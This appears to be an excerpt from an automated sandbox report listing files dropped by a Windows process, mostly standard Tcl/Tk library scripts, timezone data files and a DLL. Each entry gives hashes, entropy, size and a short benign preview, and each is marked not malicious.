                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQGurKeTIVAIgObTurKeUAti6A5nUDHurKeTv:SlSWB9IZaM3ycieZVAIgObieiidXeg
                                                                                                                                                                                                                                                                                                                                MD5:E883D478518F6DAF8173361A8D308D34
                                                                                                                                                                                                                                                                                                                                SHA1:ABD97858655B0069BFD5E11DD95BF6D7C2109AEA
                                                                                                                                                                                                                                                                                                                                SHA-256:DD4B1812A309F90ABBD001C3C73CC2AF1D4116128787DE961453CCBE53EC9B6A
                                                                                                                                                                                                                                                                                                                                SHA-512:DA1FE6D92424404111CBB18CA39C8E29FA1F9D2FD262D46231FB7A1A78D79D00F92F5D1DEBB9B92565D1E3BA03EF20D2A44B76BA0FC8B257A601EED5976386CC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Pago_Pago)]} {. LoadTimeZoneFile Pacific/Pago_Pago.}.set TZData(:US/Samoa) $TZData(:Pacific/Pago_Pago).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):148
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.792993822845485
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLiLB5h8RFu:SlSWB9IZaM3yzUFVAIgBLiLfh8RI
                                                                                                                                                                                                                                                                                                                                MD5:530F5381F9CD8542ED5690E47FC83358
                                                                                                                                                                                                                                                                                                                                SHA1:29A065F004F23A5E3606C2DB50DC0AB28CAFC785
                                                                                                                                                                                                                                                                                                                                SHA-256:AC0FF734DA267E5F20AB573DBD8C0BD7613B84D86FDA3C0809832F848E142BC8
                                                                                                                                                                                                                                                                                                                                SHA-512:4328BDFD6AA935FD539EE2D4A3EBA8DD2A1BD9F44BA0CF30AA0C4EA57B0A58E3CDFAA312366A0F93766AE445E6E210EE57CD5ED60F74173EDF67C1C5CB987C68
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:UTC) $TZData(:Etc/UTC).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):154
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.829496870339919
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLiL7DJMFfh8RFu:SlSWB9IZaM3yzUFVAIgBLiL7VMr8RI
                                                                                                                                                                                                                                                                                                                                MD5:60878BB8E8BE290911CAB2A16AAFAEF7
                                                                                                                                                                                                                                                                                                                                SHA1:15C01523EDA134D3E38ECC0A5909A4579BD2A00D
                                                                                                                                                                                                                                                                                                                                SHA-256:9324B6C871AC55771C44B82BF4A92AE0BE3B2CC64EBA9FE878571225FD38F818
                                                                                                                                                                                                                                                                                                                                SHA-512:C697401F1C979F5A4D33E1026DCE5C77603E56A48405511A09D8CE178F1BF47D60F217E7897061F71CFEA63CC041E64340EF6BAEE0EB037AFD34C71BF0591E3E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Universal) $TZData(:Etc/UTC).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):167
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.9534620854837295
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVwTwpVAIgoqzTcYFgIuyQauTnn:SlSWB9IZaM3ymdVAIgohYFgXymn
                                                                                                                                                                                                                                                                                                                                MD5:58FBF79D86DBCFF53F74BF7FE5C12DD6
                                                                                                                                                                                                                                                                                                                                SHA1:EA8B3317B012A661B3BA4A1FAE0DC5DEDC03BC26
                                                                                                                                                                                                                                                                                                                                SHA-256:0DECFEACCE2E2D88C29CB696E7974F89A687084B3DB9564CDED6FC97BCD74E1F
                                                                                                                                                                                                                                                                                                                                SHA-512:083B449DE987A634F7199666F9C685EADD643C2C2DD9C8F6C188388266729CE0179F9DC0CD432D713E5FB1649D0AA1A066FE616FC43DA65C4CD787D8E0DE00A6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Moscow)]} {. LoadTimeZoneFile Europe/Moscow.}.set TZData(:W-SU) $TZData(:Europe/Moscow).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6694
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6896780927557495
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:D6U5vo30NSfAewvtj544IrvfMS4pBs6nLUxZlJFXmA3SG7iL8malvkUEYo4Q:5PIMj544IrvfMsbxZTH7qwQ
                                                                                                                                                                                                                                                                                                                                MD5:CD86A6ED164FEB33535D74DF52DC49A5
                                                                                                                                                                                                                                                                                                                                SHA1:89843BF23AB113847DCC576990A4FF2CABCA03FE
                                                                                                                                                                                                                                                                                                                                SHA-256:AF28754C77BA41712E9C49EF3C9E08F7D43812E3317AD4E2192E971AD2C9B02D
                                                                                                                                                                                                                                                                                                                                SHA-512:80C0A7C3BDD458CA4C1505B2144A3AD969F7B2F2732CCBE4E773FBB6ED446C2961E0B5AFFBC124D43CE9AB530C42C8AEC7100E7817566629CE9D01AC057E3549
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:WET) {. {-9223372036854775808 0 0 WET}. {228877200 3600 1 WEST}. {243997200 0 0 WET}. {260326800 3600 1 WEST}. {276051600 0 0 WET}. {291776400 3600 1 WEST}. {307501200 0 0 WET}. {323830800 3600 1 WEST}. {338950800 0 0 WET}. {354675600 3600 1 WEST}. {370400400 0 0 WET}. {386125200 3600 1 WEST}. {401850000 0 0 WET}. {417574800 3600 1 WEST}. {433299600 0 0 WET}. {449024400 3600 1 WEST}. {465354000 0 0 WET}. {481078800 3600 1 WEST}. {496803600 0 0 WET}. {512528400 3600 1 WEST}. {528253200 0 0 WET}. {543978000 3600 1 WEST}. {559702800 0 0 WET}. {575427600 3600 1 WEST}. {591152400 0 0 WET}. {606877200 3600 1 WEST}. {622602000 0 0 WET}. {638326800 3600 1 WEST}. {654656400 0 0 WET}. {670381200 3600 1 WEST}. {686106000 0 0 WET}. {701830800 3600 1 WEST}. {717555600 0 0 WET}. {733280400 3600 1 WEST}. {749005200 0 0 WET}. {764730000 36
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):149
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.830292555237936
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLtaFBURFu:SlSWB9IZaM3yzUFVAIgBLYFaRI
                                                                                                                                                                                                                                                                                                                                MD5:6C7C2CE174DB462A3E66D9A8B67A28EB
                                                                                                                                                                                                                                                                                                                                SHA1:73B74BEBCDAEBDA4F46748BCA149BC4C7FE82722
                                                                                                                                                                                                                                                                                                                                SHA-256:4472453E5346AAA1E1D4E22B87FDC5F3170AA013F894546087D0DC96D4B6EC43
                                                                                                                                                                                                                                                                                                                                SHA-512:07209059E5E5EB5EE12821C1AC46922DA2715EB7D7196A478F0FA6866594D3C69F4C50006B0EE517CBF6DB07164915F976398EBBD88717A070D750D5D106BA5D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Zulu) $TZData(:Etc/UTC).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4860
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7851008522116585
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:Le+U54W37GWdh85qWdhAjgr9a+1FeS9D/CkXg6gvF9D/CYjX16AyyrGuA11/JRJZ:q+W/7GW85qW9a+P39DCd6gt9DC+6AjGN
                                                                                                                                                                                                                                                                                                                                MD5:C5DA264DC0CE5669F81702170B2CDC59
                                                                                                                                                                                                                                                                                                                                SHA1:FED571B893EE2DC93DAF8907195503885FFACBB6
                                                                                                                                                                                                                                                                                                                                SHA-256:A5311E3640E42F7EFF5CC1A0D8AD6956F738F093B037155674D46B634542FE5F
                                                                                                                                                                                                                                                                                                                                SHA-512:1F1993F1F19455F87EC9952BF7CEA00A5082BD2F2E1A417FBC4F239835F3CED6C8D5E09CDA6D1A4CD9F8A24AF174F9AB1DC7BD5E94C7A6DEE2DD9F8FE7F690FF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# word.tcl --.#.# This file defines various procedures for computing word boundaries in.# strings. This file is primarily needed so Tk text and entry widgets behave.# properly for different platforms..#.# Copyright (c) 1996 by Sun Microsystems, Inc..# Copyright (c) 1998 by Scritpics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# The following variables are used to determine which characters are.# interpreted as white space...if {$::tcl_platform(platform) eq "windows"} {. # Windows style - any but a unicode space char. if {![info exists ::tcl_wordchars]} {..set ::tcl_wordchars {\S}. }. if {![info exists ::tcl_nonwordchars]} {..set ::tcl_nonwordchars {\s}. }.} else {. # Motif style - any unicode word char (number, letter, or underscore). if {![info exists ::tcl_wordchars]} {..set ::tcl_wordchars {\w}. }. if {![info exists ::tcl_nonwordchars]} {..set ::tcl_nonwo
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1468064
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.165850680457804
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:J7+Vm6O8hbcrckTNrkhaJVQhWnmb7u/DSe9qT03ZjLmFMoERDY5TUT/tXzddGyIK:JCQ69cYY9JVQWx/DSe9qTqJLUMPsJUT/
                                                                                                                                                                                                                                                                                                                                MD5:FDC8A5D96F9576BD70AA1CADC2F21748
                                                                                                                                                                                                                                                                                                                                SHA1:BAE145525A18CE7E5BC69C5F43C6044DE7B6E004
                                                                                                                                                                                                                                                                                                                                SHA-256:1A6D0871BE2FA7153DE22BE008A20A5257B721657E6D4B24DA8B1F940345D0D5
                                                                                                                                                                                                                                                                                                                                SHA-512:816ADA61C1FD941D10E6BB4350BAA77F520E2476058249B269802BE826BAB294A9C18EDC5D590F5ED6F8DAFED502AB7FFB29DB2F44292CB5BEDF2F5FA609F49C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................B................R..................Rich..................PE..d......\.........." .........J......@........................................p.......f....`.............................................@@..P>..|........{......,....L.......0...?..`................................................ ..P............................text...c........................... ..`.rdata...?... ...@..................@..@.data........`.......N..............@....pdata..,...........................@..@.rsrc....{.......|..................@..@.reloc...?...0...@..................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8246
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8180558683809425
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:tKrjbDL5//nNFn0rBnDQQ2d4YGpFAImoYyMxZ34wNsf9GnEF5SpcJV+H//iNx:tIjL5//zC/8HLx4XKKv
                                                                                                                                                                                                                                                                                                                                MD5:11D758CEF126C5C2EDFC911237DF80F2
                                                                                                                                                                                                                                                                                                                                SHA1:7911EAA0A8B6630D016D15730310935909632389
                                                                                                                                                                                                                                                                                                                                SHA-256:DA84D32D1B447F7FFE7BBCAC0F7586B0B6DD204717C7AE1F182C6A91510EC77B
                                                                                                                                                                                                                                                                                                                                SHA-512:9E2A767FBC62622C34F468958C861EE3AFE2A63005BAD80F1637045D045E1A82FB1D2698D948D375222EBD0B92514ACE99C12DF6D9CACF75ACD03EC8057494A7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# bgerror.tcl --.#.#.Implementation of the bgerror procedure. It posts a dialog box with.#.the error message and gives the user a chance to see a more detailed.#.stack trace, and possible do something more interesting with that.#.trace (like save it to a log). This is adapted from work done by.#.Donal K. Fellows..#.# Copyright (c) 1998-2000 by Ajuba Solutions..# Copyright (c) 2007 by ActiveState Software Inc..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>.# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>..namespace eval ::tk::dialog::error {. namespace import -force ::tk::msgcat::*. namespace export bgerror. option add *ErrorDialog.function.text [mc "Save To Log"] \..widgetDefault. option add *ErrorDialog.function.command [namespace code SaveToLog]. option add *ErrorDialog*Label.font TkCaptionFont widgetDefault. if {[tk windowingsystem] eq "aqua"} {..option add *ErrorDialog*background systemAlertBackgroundActive \...widgetDefault.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):20642
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.903366631227966
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:8zVtoY3wFnq+j4SpEdPmVmZ6/IVKuzmSaox2ESo+VtocUP5wFnq+j4SpEdPmV8ZQ:coahPSFMmfoz4oFXhPovzmToQBy0zm2m
                                                                                                                                                                                                                                                                                                                                MD5:309AB5B70F664648774453BCCBE5D3CE
                                                                                                                                                                                                                                                                                                                                SHA1:51BF685DEDD21DE3786FE97BC674AB85F34BD061
                                                                                                                                                                                                                                                                                                                                SHA-256:0D95949CFACF0DF135A851F7330ACC9480B965DAC7361151AC67A6C667C6276D
                                                                                                                                                                                                                                                                                                                                SHA-512:D5139752BD7175747A5C912761916EFB63B3C193DD133AD25D020A28883A1DEA6B04310B751F5FCBE579F392A8F5F18AE556116283B3E137B4EA11A2C536EC6B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# button.tcl --.#.# This file defines the default bindings for Tk label, button,.# checkbutton, and radiobutton widgets and provides procedures.# that help in implementing those bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 2002 ActiveState Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for buttons..#-------------------------------------------------------------------------..if {[tk windowingsystem] eq "aqua"} {.. bind Radiobutton <Enter> {..tk::ButtonEnter %W. }. bind Radiobutton <1> {..tk::ButtonDown %W. }. bind Radiobutton <ButtonRelease-1> {..tk::ButtonUp %W. }. bind Checkbutton <Enter> {..tk::ButtonEnter %W. }. bind Checkbutton <1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Nim source code, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9652
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.750454352074374
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:MvjK3vpIKU7JBhpZofNAieYemp8U3wNV97oZQWpopePXUsyWjocIegf6tq9jJKT4:M4viKeBQ+3M3wNwvwsFyoIegf6wO70fN
                                                                                                                                                                                                                                                                                                                                MD5:E703C16058E7F783E9BB4357F81B564D
                                                                                                                                                                                                                                                                                                                                SHA1:1EDA07870078FC4C3690B54BB5330A722C75AA05
                                                                                                                                                                                                                                                                                                                                SHA-256:30CE631CB1CCCD20570018162C6FFEF31BAD378EF5B2DE2D982C96E65EB62EF6
                                                                                                                                                                                                                                                                                                                                SHA-512:28617F8553766CA7A66F438624AFA5FD7780F93DC9EBDF9BEE865B5649228AA56A69189218FC436CEDF2E5FE3162AD88839CBF49C9CC051238A7559B5C3BA726
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# choosedir.tcl --.#.#.Choose directory dialog implementation for Unix/Mac..#.# Copyright (c) 1998-2000 by Scriptics Corporation..# All rights reserved...# Make sure the tk::dialog namespace, in which all dialogs should live, exists.namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::file {}..# Make the chooseDir namespace inside the dialog namespace.namespace eval ::tk::dialog::file::chooseDir {. namespace import -force ::tk::msgcat::*.}..# ::tk::dialog::file::chooseDir:: --.#.#.Implements the TK directory selection dialog..#.# Arguments:.#.args..Options parsed by the procedure..#.proc ::tk::dialog::file::chooseDir:: {args} {. variable ::tk::Priv. set dataName __tk_choosedir. upvar ::tk::dialog::file::$dataName data. Config $dataName $args.. if {$data(-parent) eq "."} {. set w .$dataName. } else {. set w $data(-parent).$dataName. }.. # (re)create the dialog box if necessary. #. if {![winfo exists $w]} {..::tk::dialog::file::Create
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):21432
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.987740767386718
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:HDJsgeqJelEu6i1T26UYdTVDyPHxQlufbSIjVjrdOqAQBxhKN2zD5Ed9bmqU/FC6:jagJJnBfxQef9
                                                                                                                                                                                                                                                                                                                                MD5:E5E462E0EE0C57B31DAEECB07D038488
                                                                                                                                                                                                                                                                                                                                SHA1:E67B3410A7BCECE8B5159AB5327910038096A67B
                                                                                                                                                                                                                                                                                                                                SHA-256:823F6E4BAF5D10185D990B3FBCB8BFB4D5F4B6ED62203EE229922B6B32FE39D4
                                                                                                                                                                                                                                                                                                                                SHA-512:F8442F21E389FF9A3FC5BECCE8811F8554DEF94FBB8F184026396A87AEA37E8108A3E1B3C76FEA2CFBE4E81B2C5FC2BB8A60BE2B9831CC96CB25DAB177616238
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# clrpick.tcl --.#.#.Color selection dialog for platforms that do not support a.#.standard color selection dialog..#.# Copyright (c) 1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#.# ToDo:.#.#.(1): Find out how many free colors are left in the colormap and.#. don't allocate too many colors..#.(2): Implement HSV color selection..#..# Make sure namespaces exist.namespace eval ::tk {}.namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::color {. namespace import ::tk::msgcat::*.}..# ::tk::dialog::color:: --.#.#.Create a color dialog and let the user choose a color. This function.#.should not be called directly. It is called by the tk_chooseColor.#.function when a native color selector widget does not exist.#.proc ::tk::dialog::color:: {args} {. variable ::tk::Priv. set dataName __tk__color. upvar ::tk::dialog::color::$dataName data. set w .$dataName.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8229
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.0540566175865
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:Aq7cPy5HEOjKU8QHyWpSWNRYs50asAZ5QWlO+W0WvHv/3WvWHwV7vWKpTTk:Aq7c6HJjKCyWpZNRYEVVET1rvveuHSOT
                                                                                                                                                                                                                                                                                                                                MD5:427CCBD25BB1559B9B21A80131658140
                                                                                                                                                                                                                                                                                                                                SHA1:B675C0C1B02A527B13AA5DE2AE5A1AA754E9815D
                                                                                                                                                                                                                                                                                                                                SHA-256:586CB7A3C32566EFEB46036A19D07E91194CE8EDAF0D47F3C93BCC974E6EE3E1
                                                                                                                                                                                                                                                                                                                                SHA-512:FEA82D6D7DBAF52EE1883241170BA95396EC282CDD4F682077A238B4FD9A47C4CE6F84B1B4829A86580A4AB794820E6CD4C1E98CFB7BDCE23E09B54566BD6443
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# comdlg.tcl --.#.#.Some functions needed for the common dialog boxes. Probably need to go.#.in a different file..#.# Copyright (c) 1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# tclParseConfigSpec --.#.#.Parses a list of "-option value" pairs. If all options and.#.values are legal, the values are stored in.#.$data($option). Otherwise an error message is returned. When.#.an error happens, the data() array may have been partially.#.modified, but all the modified members of the data(0 array are.#.guaranteed to have valid values. This is different than.#.Tk_ConfigureWidget() which does not modify the value of a.#.widget record if any error occurs..#.# Arguments:.#.# w = widget record to modify. Must be the pathname of a widget..#.# specs = {.# {-commandlineswitch resourceName ResourceClass defaultValue verifier}.# {....}.# }.#.# flags = currently unused..#.# argList
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):32784
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.906598115585926
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:GkptctbjWz4xjtyU/W1ZQWSLEwYGl7nZH5J+ry3+uQlLW44qvRHRJStCO2FfB25b:GkpeZWz4miZeG7J+rMYXaGGWFOYoV
                                                                                                                                                                                                                                                                                                                                MD5:8B5B8B6D49F4CA36B8662923DCF9A46C
                                                                                                                                                                                                                                                                                                                                SHA1:BCD6CA7451BDFB22311D9D54FBABB116D4A7A687
                                                                                                                                                                                                                                                                                                                                SHA-256:7E1EAA998B1D661E9B4B72A4598A534B8311AB75D444525DD613EC73F8126750
                                                                                                                                                                                                                                                                                                                                SHA-512:D7E20377E2FBD147A68E4B647D4F09A1894A203F2FA5435B09AD2B6998FFC2F70222BD2808B6A1D1B6A96271F04E7C7A4E6AB0EAE4C97C7C728A6645C499391F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# console.tcl --.#.# This code constructs the console window for an application. It.# can be used by non-unix systems that do not have built-in support.# for shells..#.# Copyright (c) 1995-1997 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Ajuba Solutions..# Copyright (c) 2007-2008 Daniel A. Steffen <das@users.sourceforge.net>.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# TODO: history - remember partially written command..namespace eval ::tk::console {. variable blinkTime 500 ; # msecs to blink braced range for. variable blinkRange 1 ; # enable blinking of the entire braced range. variable magicKeys 1 ; # enable brace matching and proc/var recognition. variable maxLines 600 ; # maximum # of lines buffered in console. variable showMatches 1 ; # show multiple expand matches. variable useFontchooser [llength [info command ::tk::fontchooser]]. variable inPlugi
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6025
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.79563398407639
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:WfPQCAV8OgciKHKKcmQH+DmlYm4Kapo9mBc//IWxIb:WfPQCAVviKHKK4H+DmT4Kapo4cnDOb
                                                                                                                                                                                                                                                                                                                                MD5:EAC165BD7EA915B44FAEC016250E0B06
                                                                                                                                                                                                                                                                                                                                SHA1:7D205F2720E00FBDA5C0AA908CAC3F66BBC84E56
                                                                                                                                                                                                                                                                                                                                SHA-256:6D7BD4A280272E7A2748555CFFFF4FCA7CC57CE611AEB2382E3C80CDD1868D22
                                                                                                                                                                                                                                                                                                                                SHA-512:22D5794E1FF3B94365C560A310CC17B4A27BEA87DBF423DFB44273443477372013B19ED33E170EAB15A1F06BA9186BA2FC184A3751449E7EDC760D23A12B1666
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# dialog.tcl --.#.# This file defines the procedure tk_dialog, which creates a dialog.# box containing a bitmap, a message, and one or more buttons..#.# Copyright (c) 1992-1993 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#.# ::tk_dialog:.#.# This procedure displays a dialog box, waits for a button in the dialog.# to be invoked, then returns the index of the selected button. If the.# dialog somehow gets destroyed, -1 is returned..#.# Arguments:.# w -..Window to use for dialog top-level..# title -.Title to display in dialog's decorative frame..# text -.Message to display in dialog..# bitmap -.Bitmap to display in dialog (empty string means none)..# default -.Index of button that is to display the default ring.#..(-1 means none)..# args -.One or more strings to display in buttons across the.#..bottom of t
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16950
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.934745561122632
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:P/eFkH2fRdOnOeQod3tCAERebMIDlXVQgXwVviw:P2FDqUy8V
                                                                                                                                                                                                                                                                                                                                MD5:BE28D16510EE78ECC048B2446EE9A11A
                                                                                                                                                                                                                                                                                                                                SHA1:4829D6E8AB8A283209FB4738134B03B7BD768BAD
                                                                                                                                                                                                                                                                                                                                SHA-256:8F57A23C5190B50FAD00BDEE9430A615EBEBFC47843E702374AE21BEB2AD8B06
                                                                                                                                                                                                                                                                                                                                SHA-512:F56AF7020531249BC26D88B977BAFFC612B6566146730A681A798FF40BE9EBC04D7F80729BAFE0B9D4FAC5B0582B76F9530F3FE376D42A738C9BC4B3B442DF1F
                                                                                                                                                                                                                                                                                                                                Malicious:false
